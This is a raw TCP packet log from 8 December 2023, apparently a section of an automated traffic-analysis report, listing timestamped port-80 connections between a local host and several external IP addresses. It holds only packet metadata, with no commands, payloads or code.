                                                                                                                                                            Dec 8, 2023 14:51:12.395463943 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.395500898 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.395977020 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.396040916 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.396081924 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397109985 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397156000 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397191048 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397538900 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397599936 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397633076 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.397650957 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397713900 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.397746086 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398195028 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398260117 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398297071 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398439884 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398542881 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.398580074 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.398952961 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399066925 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399104118 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.399476051 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399524927 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.399560928 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.399971008 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400022984 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400054932 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.400479078 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400791883 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.400831938 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.401024103 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401101112 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401135921 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.401506901 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401556015 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.401591063 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402117014 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402164936 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402199030 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402501106 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402566910 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.402601957 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.402978897 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403033972 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403069019 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.403551102 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403610945 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.403645039 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.403985023 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404053926 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404086113 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.404459953 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404620886 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.404656887 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.404952049 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.405009985 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.405046940 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.405443907 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.405632019 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.405682087 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.405934095 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.406006098 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.406058073 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.406444073 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.406513929 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.406548023 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.406910896 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.407005072 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.407040119 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.407445908 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.407525063 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.407558918 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.407908916 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.407984018 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.408018112 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.408353090 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.408415079 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.408447981 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.408951998 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.408999920 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.409109116 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.409352064 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.409406900 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.409441948 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.409954071 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.410048008 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.410079956 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.410409927 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.410463095 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.410495043 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.411164045 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.412744045 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.412811041 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.674318075 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674340963 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674504042 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.674709082 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674772978 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674809933 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.674889088 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674951077 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.674988031 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.675204039 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675240040 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675272942 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.675486088 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675527096 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675559044 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.675774097 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675834894 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.675868988 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.676170111 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.676245928 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.676279068 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.676784992 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.676861048 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.676893950 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.676965952 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677017927 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677051067 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.677300930 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677340984 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677372932 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.677848101 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677887917 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.677922964 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.678045034 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.678118944 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.678164959 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.678302050 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.678349972 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.678389072 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.678709984 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:12.678834915 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.679100990 CET4975280192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:12.960130930 CET804975237.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:18.141638994 CET4975380192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:18.296540976 CET8049753131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:18.296709061 CET4975380192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:18.296947956 CET4975380192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:18.451935053 CET8049753131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:18.456036091 CET8049753131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:18.456079960 CET8049753131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:18.456130028 CET4975380192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:19.810538054 CET4975380192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:21.666951895 CET4975480192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:21.822091103 CET8049754131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:21.822241068 CET4975480192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:21.900505066 CET4975480192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:22.056169033 CET8049754131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:22.063608885 CET8049754131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:22.063627005 CET8049754131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:22.063694000 CET4975480192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:23.404232025 CET4975480192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:24.420917988 CET4975580192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:24.575742006 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.575903893 CET4975580192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:24.577001095 CET4975580192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:24.731837034 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.731913090 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.731949091 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732017040 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732057095 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732183933 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732239008 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732333899 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.732376099 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.753015041 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.753038883 CET8049755131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:24.753102064 CET4975580192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:26.091779947 CET4975580192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.108036041 CET4975680192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.263082981 CET8049756131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:27.263204098 CET4975680192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.263885975 CET4975680192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.418519974 CET8049756131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:27.422880888 CET8049756131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:27.422930956 CET8049756131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:27.423055887 CET4975680192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.423238993 CET4975680192.168.2.4131.153.147.90
                                                                                                                                                            Dec 8, 2023 14:51:27.577919006 CET8049756131.153.147.90192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:32.807706118 CET4975780192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:33.043910980 CET804975794.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:33.044003010 CET4975780192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:33.044251919 CET4975780192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:33.280381918 CET804975794.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:33.280489922 CET804975794.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:33.280545950 CET4975780192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:34.544893980 CET4975780192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:34.781486034 CET804975794.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:35.561388969 CET4975880192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:35.797717094 CET804975894.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:35.797858953 CET4975880192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:35.798079014 CET4975880192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:36.034255028 CET804975894.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:36.034286976 CET804975894.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:36.034351110 CET4975880192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:37.310575962 CET4975880192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:37.547036886 CET804975894.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.215042114 CET4975980192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:39.448036909 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.448137999 CET4975980192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:39.448764086 CET4975980192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:39.681452990 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681474924 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681543112 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681602001 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681657076 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681708097 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681772947 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681827068 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:39.681865931 CET804975994.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:41.967252970 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.204022884 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:42.204140902 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.204368114 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.441036940 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:42.441059113 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:42.441070080 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:42.441339016 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.441430092 CET4976080192.168.2.494.23.162.163
                                                                                                                                                            Dec 8, 2023 14:51:42.677983046 CET804976094.23.162.163192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:47.709320068 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:47.908075094 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:47.908282042 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:47.909106970 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.107180119 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218774080 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218889952 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218908072 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.218945026 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.218985081 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.219006062 CET804976166.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:48.219034910 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:48.219052076 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:49.419867992 CET4976180192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.435796976 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.634686947 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.634891987 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.635157108 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.832496881 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925204039 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925232887 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925275087 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.925378084 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925425053 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925462961 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:50.925646067 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925743103 CET804976266.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:50.925787926 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:52.138719082 CET4976280192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.154515982 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.352861881 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.353034973 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.354933023 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.552536964 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.552727938 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.552747011 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.648900986 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.648968935 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649008036 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649044991 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649080992 CET804976366.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:53.649075031 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.649136066 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:53.649168968 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:54.857426882 CET4976380192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:56.758057117 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:56.957597971 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:56.957792044 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.012130022 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.209829092 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301047087 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301076889 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301099062 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301146030 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301158905 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:57.301245928 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.301294088 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.301553965 CET4976480192.168.2.466.29.155.54
                                                                                                                                                            Dec 8, 2023 14:51:57.498971939 CET804976466.29.155.54192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.534619093 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.658931971 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.659087896 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.659353971 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.784538031 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.983591080 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986537933 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986649036 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:03.986684084 CET804976534.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:03.986771107 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:05.169734955 CET4976580192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.185972929 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.311578035 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.311975956 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.312115908 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.437676907 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637350082 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637448072 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637475014 CET804976634.117.26.57192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:52:06.637497902 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:06.637531996 CET4976680192.168.2.434.117.26.57
                                                                                                                                                            Dec 8, 2023 14:52:07.826076031 CET4976680192.168.2.434.117.26.57
